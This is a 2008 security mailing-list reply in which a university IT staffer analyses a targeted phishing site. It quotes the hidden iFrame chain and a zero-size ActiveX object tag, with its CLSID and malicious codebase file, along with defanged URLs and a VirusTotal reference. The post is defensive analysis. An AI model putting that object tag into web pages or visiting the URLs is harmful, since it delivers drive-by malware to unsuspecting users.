[unisog] very specific IT-department phish
Michael Holstein
michael.holstein at csuohio.edu
Wed Jun 11 17:17:33 GMT 2008
> It probably is a legit Active X control, but on with a serious security hole
> that can be exploited. Active X is very dangerous as any Active X control
> can be used by any web page.
>
I don't think so .. further analysis :
hxxp://www.revenue-system.com/Body.php calls an iFrame that loads
hxxp://www.revenue-system/Acrobat.php
<object classid="clsid:BD942DA7-96C8-4342-84C6-E2BCFE69FE11" height="0"
width="0" codebase="Acrobat.php"></object>
This file is already on Virustotal :
http://www.virustotal.com/analisis/13bfb6913f9c328c7b657fce4ba4c731
A Google search of that CLSID shows it affiliated with a bunch of other
phishing/malware attempts.
Cheers,
Michael Holstein
Cleveland State University
More information about the unisog
mailing list